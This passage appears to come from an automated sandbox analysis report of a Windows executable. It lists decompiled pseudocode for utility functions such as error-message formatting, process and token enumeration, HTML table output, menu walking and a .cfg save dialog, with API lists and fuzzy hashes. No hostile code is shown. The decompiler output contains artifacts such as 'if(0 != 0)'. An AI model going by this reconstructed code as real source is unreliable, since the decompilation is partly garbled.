                                                                                                                • Opcode ID: 5da42dd6f8dc2a5a5ce51cfedbbbc012e548a5dc60c7f50195cd90505966b8bd
                                                                                                                • Instruction ID: a6c41b950ec0abdba219e0cd23eeccead18917629e413d377b87badc6c60029b
                                                                                                                • Opcode Fuzzy Hash: 5da42dd6f8dc2a5a5ce51cfedbbbc012e548a5dc60c7f50195cd90505966b8bd
                                                                                                                • Instruction Fuzzy Hash: 65117732840119BAEB20EB95DC89EDF777CEF04754F0040BAF518F1192E7345A81CA9D
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00404706, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 52librarywindowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 68%
                                                                                                                			E00404706(long __edi, wchar_t* _a4) {
				short _v8;
				void* _t8;
				void* _t10;
				long _t14;
				long _t24;

				_t24 = __edi;
				_t8 = 0;
				_t14 = 0x1100;
				if(__edi - 0x834 <= 0x383) {
					_t8 = LoadLibraryExW(L"netmsg.dll", 0, 2);
					if(0 != 0) {
						_t14 = 0x1900;
					}
				}
				if(FormatMessageW(_t14, _t8, _t24, 0x400,  &_v8, 0, 0) <= 0) {
					_t10 = wcscpy(_a4, 0x40c4e8);
				} else {
					if(wcslen(_v8) < 0x400) {
						wcscpy(_a4, _v8);
					}
					_t10 = LocalFree(_v8);
				}
				return _t10;
			}








                                                                                                                0x00404706
                                                                                                                0x00404714
                                                                                                                0x0040471c
                                                                                                                0x00404721
                                                                                                                0x0040472b
                                                                                                                0x00404733
                                                                                                                0x00404735
                                                                                                                0x00404735
                                                                                                                0x00404733
                                                                                                                0x00404751
                                                                                                                0x00404780
                                                                                                                0x00404753
                                                                                                                0x0040475e
                                                                                                                0x00404766
                                                                                                                0x0040476c
                                                                                                                0x00404770
                                                                                                                0x00404770
                                                                                                                0x0040478a

                                                                                                                APIs
                                                                                                                • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,004047FA,?,?,?,004035EB,?,?), ref: 0040472B
                                                                                                                • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,00000000,?,?,004047FA,?,?,?,004035EB), ref: 00404749
                                                                                                                • wcslen.MSVCRT ref: 00404756
                                                                                                                • wcscpy.MSVCRT ref: 00404766
                                                                                                                • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,00000000,?,?,004047FA,?,?,?,004035EB,?), ref: 00404770
                                                                                                                • wcscpy.MSVCRT ref: 00404780
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                • String ID: netmsg.dll
                                                                                                                • API String ID: 2767993716-3706735626
                                                                                                                • Opcode ID: 1e136739243523e06bb2833156c7d3ecb9fe647eacfe1b285a6198c622c21fe1
                                                                                                                • Instruction ID: 89adc518ee94488043421af4a237527fbec77c55aa854962abbb3bd0e0f931e1
                                                                                                                • Opcode Fuzzy Hash: 1e136739243523e06bb2833156c7d3ecb9fe647eacfe1b285a6198c622c21fe1
                                                                                                                • Instruction Fuzzy Hash: 4F01D471200114FAEB152B61DD8AE9F7A6CEB46796B20417AFA02B60D1DB755E0086AC
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040598B, Relevance: 12.1, APIs: 8, Instructions: 96COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 90%
                                                                                                                			E0040598B(void* __edx, void* __eflags, intOrPtr _a4) {
				intOrPtr _v12;
				void* _v16;
				intOrPtr _v20;
				char _v32;
				char _v72;
				void _v582;
				long _v584;
				void* __edi;
				intOrPtr _t27;
				wchar_t* _t34;
				wchar_t* _t42;
				long* _t43;
				int _t44;
				void* _t52;
				void* _t54;
				long _t56;
				long* _t57;
				void* _t60;

				_t60 = __eflags;
				_t52 = __edx;
				E004095AB( &_v72);
				_v584 = 0;
				memset( &_v582, 0, 0x1fe);
				E004095FD(_t52, _t60,  &_v72);
				_t27 = 0;
				_v12 = 0;
				if(_v20 <= 0) {
					L10:
					_t56 = 0;
				} else {
					do {
						_t57 = E00405A92(_t27,  &_v32);
						if(E00409A94( *_t57,  &_v584) == 0) {
							goto L9;
						} else {
							_t34 =  &_v584;
							_push(_t34);
							_push(_a4);
							L0040B278();
							if(_t34 == 0) {
								L5:
								_t44 = 0;
								_t54 = OpenProcess(0x2000000, 0,  *_t57);
								if(_t54 == 0) {
									goto L9;
								} else {
									_v16 = _v16 & 0;
									if(OpenProcessToken(_t54, 2,  &_v16) != 0) {
										_t44 = 1;
										CloseHandle(_v16);
									}
									CloseHandle(_t54);
									if(_t44 != 0) {
										_t56 =  *_t57;
									} else {
										goto L9;
									}
								}
							} else {
								_t42 = wcschr( &_v584, 0x5c);
								if(_t42 == 0) {
									goto L9;
								} else {
									_t43 =  &(_t42[0]);
									_push(_t43);
									_push(_a4);
									L0040B278();
									if(_t43 != 0) {
										goto L9;
									} else {
										goto L5;
									}
								}
							}
						}
						goto L12;
						L9:
						_t27 = _v12 + 1;
						_v12 = _t27;
					} while (_t27 < _v20);
					goto L10;
				}
				L12:
				E004095DA( &_v72);
				return _t56;
			}





















                                                                                                                0x0040598b
                                                                                                                0x0040598b
                                                                                                                0x0040599a
                                                                                                                0x004059ae
                                                                                                                0x004059b5
                                                                                                                0x004059c1
                                                                                                                0x004059c6
                                                                                                                0x004059cb
                                                                                                                0x004059ce
                                                                                                                0x00405a7b
                                                                                                                0x00405a7b
                                                                                                                0x004059d4
                                                                                                                0x004059d4
                                                                                                                0x004059dc
                                                                                                                0x004059ee
                                                                                                                0x00000000
                                                                                                                0x004059f0
                                                                                                                0x004059f0
                                                                                                                0x004059f6
                                                                                                                0x004059f7
                                                                                                                0x004059fa
                                                                                                                0x00405a03
                                                                                                                0x00405a2b
                                                                                                                0x00405a2e
                                                                                                                0x00405a3c
                                                                                                                0x00405a40
                                                                                                                0x00000000
                                                                                                                0x00405a42
                                                                                                                0x00405a42
                                                                                                                0x00405a54
                                                                                                                0x00405a59
                                                                                                                0x00405a5a
                                                                                                                0x00405a5a
                                                                                                                0x00405a61
                                                                                                                0x00405a69
                                                                                                                0x00405a7f
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00405a69
                                                                                                                0x00405a05
                                                                                                                0x00405a0e
                                                                                                                0x00405a17
                                                                                                                0x00000000
                                                                                                                0x00405a19
                                                                                                                0x00405a19
                                                                                                                0x00405a1c
                                                                                                                0x00405a1d
                                                                                                                0x00405a20
                                                                                                                0x00405a29
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00405a29
                                                                                                                0x00405a17
                                                                                                                0x00405a03
                                                                                                                0x00000000
                                                                                                                0x00405a6b
                                                                                                                0x00405a6e
                                                                                                                0x00405a72
                                                                                                                0x00405a72
                                                                                                                0x00000000
                                                                                                                0x004059d4
                                                                                                                0x00405a81
                                                                                                                0x00405a84
                                                                                                                0x00405a8f

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 004059B5
                                                                                                                  • Part of subcall function 004095FD: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00409619
                                                                                                                  • Part of subcall function 004095FD: memset.MSVCRT ref: 0040962E
                                                                                                                  • Part of subcall function 004095FD: Process32FirstW.KERNEL32(?,?), ref: 0040964A
                                                                                                                  • Part of subcall function 004095FD: Process32NextW.KERNEL32(?,0000022C), ref: 0040978C
                                                                                                                  • Part of subcall function 004095FD: CloseHandle.KERNEL32(?,?,0000022C,?,?,?,?,00000000,?), ref: 0040979C
                                                                                                                  • Part of subcall function 00409A94: memset.MSVCRT ref: 00409AB7
                                                                                                                  • Part of subcall function 00409A94: memset.MSVCRT ref: 00409ACF
                                                                                                                  • Part of subcall function 00409A94: OpenProcess.KERNEL32(00000400,00000000,?,?,?,?,?,00000000,00000000), ref: 00409AE0
                                                                                                                  • Part of subcall function 00409A94: memset.MSVCRT ref: 00409B25
                                                                                                                  • Part of subcall function 00409A94: GetProcAddress.KERNEL32(?,GetTokenInformation), ref: 00409B4B
                                                                                                                  • Part of subcall function 00409A94: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000008,?), ref: 00409C26
                                                                                                                  • Part of subcall function 00409A94: FreeLibrary.KERNEL32(?,?,?,?,?,?,00000000,00000008,?,?,?,?,?,00000000,00000000), ref: 00409C34
                                                                                                                • _wcsicmp.MSVCRT ref: 004059FA
                                                                                                                • wcschr.MSVCRT ref: 00405A0E
                                                                                                                • _wcsicmp.MSVCRT ref: 00405A20
                                                                                                                • OpenProcess.KERNEL32(02000000,00000000,00000000,00000000,?,?,?,?,00000000), ref: 00405A36
                                                                                                                • OpenProcessToken.ADVAPI32(00000000,00000002,?), ref: 00405A4C
                                                                                                                • CloseHandle.KERNEL32(?), ref: 00405A5A
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00405A61
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memset$CloseHandle$OpenProcess$Process32_wcsicmp$AddressCreateFirstFreeLibraryNextProcSnapshotTokenToolhelp32wcschr
                                                                                                                • String ID:
                                                                                                                • API String ID: 768606695-0
                                                                                                                • Opcode ID: 24c99ff6b226417a7cff51520edeb71ca8997190fc09f0f890f68f92aaad849e
                                                                                                                • Instruction ID: 2def5e4e0f7fb713a9aee1133a075480eaa7d54608268b88a97ef3230c71c50c
                                                                                                                • Opcode Fuzzy Hash: 24c99ff6b226417a7cff51520edeb71ca8997190fc09f0f890f68f92aaad849e
                                                                                                                • Instruction Fuzzy Hash: 18318472A00619ABDB10EBA1DD89AAF77B8EF04345F10457BE905F2191EB349E018F98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00407639, Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 103COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 64%
                                                                                                                			E00407639(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void _v68;
				char _v108;
				void _v160;
				void* __esi;
				signed int _t55;
				void* _t57;
				wchar_t* _t67;
				intOrPtr* _t73;
				signed int _t74;
				signed int _t86;
				signed int _t95;
				intOrPtr* _t98;
				void* _t100;
				void* _t102;

				_t73 = __ebx;
				_t74 = 0xd;
				_push(9);
				memcpy( &_v160, L"<td bgcolor=#%s nowrap>%s", _t74 << 2);
				memcpy( &_v68, L"<td bgcolor=#%s>%s", 0 << 2);
				_t102 = _t100 + 0x18;
				asm("movsw");
				E00407343(__ebx, _a4, L"<tr>");
				_t95 = 0;
				if( *((intOrPtr*)(__ebx + 0x2c)) > 0) {
					do {
						_t55 =  *( *((intOrPtr*)(_t73 + 0x30)) + _t95 * 4);
						_v8 = _t55;
						_t57 =  &_v160;
						if( *((intOrPtr*)(_t55 * 0x14 +  *((intOrPtr*)(_t73 + 0x40)) + 8)) == 0) {
							_t57 =  &_v68;
						}
						_t98 = _a8;
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _v20 | 0xffffffff;
						_v16 = _v16 & 0x00000000;
						_v12 = _t57;
						 *((intOrPtr*)( *_t73 + 0x34))(5, _t95, _t98,  &_v28);
						E0040ADC0(_v28,  &_v108);
						E0040ADF1( *((intOrPtr*)( *_t98))(_v8,  *((intOrPtr*)(_t73 + 0x60))),  *(_t73 + 0x64));
						 *((intOrPtr*)( *_t73 + 0x50))( *(_t73 + 0x64), _t98, _v8);
						_t67 =  *(_t73 + 0x64);
						_t86 =  *_t67 & 0x0000ffff;
						if(_t86 == 0 || _t86 == 0x20) {
							wcscat(_t67, L"&nbsp;");
						}
						E0040AE90( &_v28,  *((intOrPtr*)(_t73 + 0x68)),  *(_t73 + 0x64));
						_push( *((intOrPtr*)(_t73 + 0x68)));
						_push( &_v108);
						_push(_v12);
						_push(0x2000);
						_push( *((intOrPtr*)(_t73 + 0x60)));
						L0040B1EC();
						_t102 = _t102 + 0x1c;
						E00407343(_t73, _a4,  *((intOrPtr*)(_t73 + 0x60)));
						_t95 = _t95 + 1;
					} while (_t95 <  *((intOrPtr*)(_t73 + 0x2c)));
				}
				return E00407343(_t73, _a4, L"\r\n");
			}























                                                                                                                0x00407639
                                                                                                                0x00407646
                                                                                                                0x00407647
                                                                                                                0x00407654
                                                                                                                0x0040765f
                                                                                                                0x0040765f
                                                                                                                0x0040766b
                                                                                                                0x0040766d
                                                                                                                0x00407672
                                                                                                                0x00407677
                                                                                                                0x0040767d
                                                                                                                0x00407680
                                                                                                                0x00407686
                                                                                                                0x00407691
                                                                                                                0x00407697
                                                                                                                0x00407699
                                                                                                                0x00407699
                                                                                                                0x0040769c
                                                                                                                0x0040769f
                                                                                                                0x004076a3
                                                                                                                0x004076a7
                                                                                                                0x004076ab
                                                                                                                0x004076b5
                                                                                                                0x004076be
                                                                                                                0x004076c8
                                                                                                                0x004076de
                                                                                                                0x004076ee
                                                                                                                0x004076f1
                                                                                                                0x004076f4
                                                                                                                0x004076fa
                                                                                                                0x00407708
                                                                                                                0x0040770e
                                                                                                                0x00407718
                                                                                                                0x0040771d
                                                                                                                0x00407723
                                                                                                                0x00407724
                                                                                                                0x00407727
                                                                                                                0x0040772c
                                                                                                                0x0040772f
                                                                                                                0x00407734
                                                                                                                0x0040773f
                                                                                                                0x00407744
                                                                                                                0x00407745
                                                                                                                0x0040767d
                                                                                                                0x00407760

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintfwcscat
                                                                                                                • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                • API String ID: 384018552-4153097237
                                                                                                                • Opcode ID: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
                                                                                                                • Instruction ID: d8c40f1c932df66c49e6576a1425660ae0ae50b86724cae367092fb81a03718d
                                                                                                                • Opcode Fuzzy Hash: 95fb47b0eb5c6bd29b2c4fa7ee5083eabdad1f03c3a152d85f26f239cd8b3326
                                                                                                                • Instruction Fuzzy Hash: 75318C31A00209EFDF14AF55CC86AAA7B76FF04320F1001AAF905BB2D2D735AA51DB95
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040605E, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 79windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 42%
                                                                                                                			E0040605E(void* __ecx, void* __eflags, intOrPtr _a4, struct HMENU__* _a8, intOrPtr _a12, int _a16, intOrPtr _a20, wchar_t* _a36, intOrPtr _a40, long _a48, void _a50) {
				struct tagMENUITEMINFOW _v0;
				int _t24;
				wchar_t* _t30;
				intOrPtr _t32;
				int _t34;
				int _t42;
				signed int _t47;
				signed int _t48;

				_t36 = __ecx;
				_t48 = _t47 & 0xfffffff8;
				E0040B550(0x203c, __ecx);
				_t24 = GetMenuItemCount(_a8);
				_t34 = _t24;
				_t42 = 0;
				if(_t34 <= 0) {
					L13:
					return _t24;
				} else {
					goto L1;
				}
				do {
					L1:
					memset( &_a50, 0, 0x2000);
					_t48 = _t48 + 0xc;
					_a36 =  &_a48;
					_v0.cbSize = 0x30;
					_a4 = 0x36;
					_a40 = 0x1000;
					_a16 = 0;
					_a48 = 0;
					_t24 = GetMenuItemInfoW(_a8, _t42, 1,  &_v0);
					if(_t24 == 0) {
						goto L12;
					}
					if(_a48 == 0) {
						L10:
						_t56 = _a20;
						if(_a20 != 0) {
							_push(0);
							_push(_a20);
							_push(_a4);
							_t24 = E0040605E(_t36, _t56);
							_t48 = _t48 + 0xc;
						}
						goto L12;
					}
					_t30 = wcschr( &_a48, 9);
					if(_t30 != 0) {
						 *_t30 = 0;
					}
					_t31 = _a16;
					if(_a20 != 0) {
						if(_a12 == 0) {
							 *0x40fe20 =  *0x40fe20 + 1;
							_t32 =  *0x40fe20; // 0x0
							_t31 = _t32 + 0x11558;
							__eflags = _t32 + 0x11558;
						} else {
							_t17 = _t42 + 0x11171; // 0x11171
							_t31 = _t17;
						}
					}
					_t24 = E00406025(_t31,  &_a48);
					_pop(_t36);
					goto L10;
					L12:
					_t42 = _t42 + 1;
				} while (_t42 < _t34);
				goto L13;
			}











                                                                                                                0x0040605e
                                                                                                                0x00406061
                                                                                                                0x00406069
                                                                                                                0x00406074
                                                                                                                0x0040607a
                                                                                                                0x0040607e
                                                                                                                0x00406082
                                                                                                                0x00406148
                                                                                                                0x0040614e
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00406088
                                                                                                                0x00406088
                                                                                                                0x00406093
                                                                                                                0x00406098
                                                                                                                0x0040609f
                                                                                                                0x004060ae
                                                                                                                0x004060b6
                                                                                                                0x004060be
                                                                                                                0x004060c6
                                                                                                                0x004060ca
                                                                                                                0x004060cf
                                                                                                                0x004060d7
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004060de
                                                                                                                0x00406129
                                                                                                                0x00406129
                                                                                                                0x0040612d
                                                                                                                0x0040612f
                                                                                                                0x00406130
                                                                                                                0x00406134
                                                                                                                0x00406137
                                                                                                                0x0040613c
                                                                                                                0x0040613c
                                                                                                                0x00000000
                                                                                                                0x0040612d
                                                                                                                0x004060e7
                                                                                                                0x004060f0
                                                                                                                0x004060f2
                                                                                                                0x004060f2
                                                                                                                0x004060f9
                                                                                                                0x004060fd
                                                                                                                0x00406102
                                                                                                                0x0040610c
                                                                                                                0x00406112
                                                                                                                0x00406117
                                                                                                                0x00406117
                                                                                                                0x00406104
                                                                                                                0x00406104
                                                                                                                0x00406104
                                                                                                                0x00406104
                                                                                                                0x00406102
                                                                                                                0x00406122
                                                                                                                0x00406128
                                                                                                                0x00000000
                                                                                                                0x0040613f
                                                                                                                0x0040613f
                                                                                                                0x00406140
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                • String ID: 0$6
                                                                                                                • API String ID: 2029023288-3849865405
                                                                                                                • Opcode ID: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
                                                                                                                • Instruction ID: 45aed224341beddc1f9b42311d86e3f1d1daa84a2c492251b1da63e2972132ba
                                                                                                                • Opcode Fuzzy Hash: c92d9e803ec22cf5b140ab292b4c2ab892016db16de87d00b51606d693616624
                                                                                                                • Instruction Fuzzy Hash: 7521F132504304ABC720DF45D84599FB7E8FB85754F000A3FF685A62D1E776C950CB8A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00402BEE, Relevance: 10.6, APIs: 7, Instructions: 79COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 82%
                                                                                                                			E00402BEE(void* __ebx) {
				int _v8;
				int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				int _v24;
				int _v28;
				void* _t27;
				int _t31;
				void* _t34;
				int _t37;
				int _t38;
				int _t41;
				int _t50;

				_t34 = __ebx;
				if( *((intOrPtr*)(__ebx + 0x10)) == 0 ||  *((intOrPtr*)(__ebx + 0x14)) == 0) {
					return _t27;
				} else {
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					_v8 = GetSystemMetrics(0x4e);
					_v12 = GetSystemMetrics(0x4f);
					_t41 = GetSystemMetrics(0x4c);
					_t31 = GetSystemMetrics(0x4d);
					if(_v8 == 0 || _v12 == 0) {
						_v8 = GetSystemMetrics(0);
						_v12 = GetSystemMetrics(1);
						_t41 = 0;
						_t31 = 0;
					} else {
						_v8 = _v8 + _t41;
						_v12 = _v12 + _t31;
					}
					_t50 = _v20 - _v28;
					if(_t50 > 0x14) {
						_t38 = _v24;
						_t37 = _v16 - _t38;
						if(_t37 > 0x14 && _v20 > _t41 + 5) {
							_t31 = _t31 + 0xfffffff6;
							if(_t38 >= _t31) {
								_t31 = _v28;
								if(_t31 + 0x14 < _v8 && _t38 + 0x14 < _v12 &&  *((intOrPtr*)(_t34 + 0x1c)) != 0) {
									_t31 = SetWindowPos( *(_t34 + 0x10), 0, _t31, _t38, _t50, _t37, 0x204);
								}
							}
						}
					}
					return _t31;
				}
			}
















                                                                                                                0x00402bee
                                                                                                                0x00402bf8
                                                                                                                0x00402cae
                                                                                                                0x00402c08
                                                                                                                0x00402c10
                                                                                                                0x00402c11
                                                                                                                0x00402c12
                                                                                                                0x00402c13
                                                                                                                0x00402c20
                                                                                                                0x00402c27
                                                                                                                0x00402c2e
                                                                                                                0x00402c30
                                                                                                                0x00402c37
                                                                                                                0x00402c4b
                                                                                                                0x00402c50
                                                                                                                0x00402c53
                                                                                                                0x00402c55
                                                                                                                0x00402c3e
                                                                                                                0x00402c3e
                                                                                                                0x00402c41
                                                                                                                0x00402c41
                                                                                                                0x00402c5a
                                                                                                                0x00402c60
                                                                                                                0x00402c65
                                                                                                                0x00402c68
                                                                                                                0x00402c6d
                                                                                                                0x00402c77
                                                                                                                0x00402c7c
                                                                                                                0x00402c7e
                                                                                                                0x00402c87
                                                                                                                0x00402ca5
                                                                                                                0x00402ca5
                                                                                                                0x00402c87
                                                                                                                0x00402c7c
                                                                                                                0x00402c6d
                                                                                                                0x00000000
                                                                                                                0x00402cac

                                                                                                                APIs
                                                                                                                • GetSystemMetrics.USER32 ref: 00402C1C
                                                                                                                • GetSystemMetrics.USER32 ref: 00402C23
                                                                                                                • GetSystemMetrics.USER32 ref: 00402C2A
                                                                                                                • GetSystemMetrics.USER32 ref: 00402C30
                                                                                                                • GetSystemMetrics.USER32 ref: 00402C47
                                                                                                                • GetSystemMetrics.USER32 ref: 00402C4E
                                                                                                                • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204,?,?,?,?,?,?,?,?,0040365B), ref: 00402CA5
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: MetricsSystem$Window
                                                                                                                • String ID:
                                                                                                                • API String ID: 1155976603-0
                                                                                                                • Opcode ID: 03bfd9196a1312a0750f0a2641b8d8190b91a017e6f04a5dd0b934da2af22e19
                                                                                                                • Instruction ID: 7065afd7c6b37d04baa6ac94661e9c3c7a9384fc7fb7d7b8ebf201216021487f
                                                                                                                • Opcode Fuzzy Hash: 03bfd9196a1312a0750f0a2641b8d8190b91a017e6f04a5dd0b934da2af22e19
                                                                                                                • Instruction Fuzzy Hash: B9217F72D00219EBEF14DF68CE496AF7B75EF40318F11446AD901BB1C5D2B8AD81CA98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004036D5, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 78COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E004036D5(void* __edi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char* _v24;
				char _v28;
				char* _v48;
				intOrPtr _v56;
				intOrPtr _v60;
				int _v64;
				int _v72;
				intOrPtr _v76;
				wchar_t* _v80;
				intOrPtr _v84;
				int _v92;
				char* _v96;
				intOrPtr _v104;
				struct tagOFNA _v108;
				void _v634;
				long _v636;
				void _v2682;
				char _v2684;
				void* __ebx;
				char _t37;
				intOrPtr _t38;
				int _t46;
				signed short _t54;

				_v636 = 0;
				memset( &_v634, 0, 0x208);
				_v2684 = 0;
				memset( &_v2682, 0, 0x7fe);
				_t37 =  *((intOrPtr*)(L"cfg")); // 0x660063
				_v12 = _t37;
				_t38 =  *0x40cbf0; // 0x67
				_v8 = _t38;
				_v28 = E00405B81(0x227);
				_v24 = L"*.cfg";
				_v20 = E00405B81(0x228);
				_v16 = L"*.*";
				E00405236( &_v2684,  &_v28);
				_t54 = 0xa;
				_v60 = E00405B81(_t54);
				_v104 =  *((intOrPtr*)(__edi + 0x10));
				_v48 =  &_v12;
				_v96 =  &_v2684;
				_v108 = 0x4c;
				_v92 = 0;
				_v84 = 1;
				_v80 =  &_v636;
				_v76 = 0x104;
				_v72 = 0;
				_v64 = 0;
				_v56 = 0x80806;
				_t46 = GetSaveFileNameW( &_v108);
				if(_t46 != 0) {
					wcscpy( &_v636, _v80);
					return E0040365E(__edi, 1,  &_v636);
				}
				return _t46;
			}






























                                                                                                                0x004036ef
                                                                                                                0x004036f6
                                                                                                                0x0040370b
                                                                                                                0x00403712
                                                                                                                0x00403717
                                                                                                                0x0040371c
                                                                                                                0x0040371f
                                                                                                                0x0040372c
                                                                                                                0x00403735
                                                                                                                0x00403738
                                                                                                                0x00403744
                                                                                                                0x00403751
                                                                                                                0x00403758
                                                                                                                0x00403760
                                                                                                                0x00403769
                                                                                                                0x0040376c
                                                                                                                0x00403778
                                                                                                                0x0040377b
                                                                                                                0x0040378b
                                                                                                                0x00403792
                                                                                                                0x00403795
                                                                                                                0x00403798
                                                                                                                0x0040379b
                                                                                                                0x004037a2
                                                                                                                0x004037a5
                                                                                                                0x004037a8
                                                                                                                0x004037af
                                                                                                                0x004037b7
                                                                                                                0x004037c3
                                                                                                                0x00000000
                                                                                                                0x004037d4
                                                                                                                0x004037dc

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 004036F6
                                                                                                                • memset.MSVCRT ref: 00403712
                                                                                                                  • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,00403490), ref: 00405BC0
                                                                                                                  • Part of subcall function 00405B81: LoadStringW.USER32(00000000,000001F5,?), ref: 00405C59
                                                                                                                  • Part of subcall function 00405B81: memcpy.MSVCRT ref: 00405C99
                                                                                                                  • Part of subcall function 00405B81: wcscpy.MSVCRT ref: 00405C02
                                                                                                                  • Part of subcall function 00405B81: wcslen.MSVCRT ref: 00405C20
                                                                                                                  • Part of subcall function 00405B81: GetModuleHandleW.KERNEL32(00000000,?,?,?,00403490), ref: 00405C2E
                                                                                                                  • Part of subcall function 00405236: memset.MSVCRT ref: 00405257
                                                                                                                  • Part of subcall function 00405236: _snwprintf.MSVCRT ref: 00405285
                                                                                                                  • Part of subcall function 00405236: wcslen.MSVCRT ref: 00405291
                                                                                                                  • Part of subcall function 00405236: memcpy.MSVCRT ref: 004052A9
                                                                                                                  • Part of subcall function 00405236: wcslen.MSVCRT ref: 004052B7
                                                                                                                  • Part of subcall function 00405236: memcpy.MSVCRT ref: 004052CA
                                                                                                                • GetSaveFileNameW.COMDLG32(?), ref: 004037AF
                                                                                                                • wcscpy.MSVCRT ref: 004037C3
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
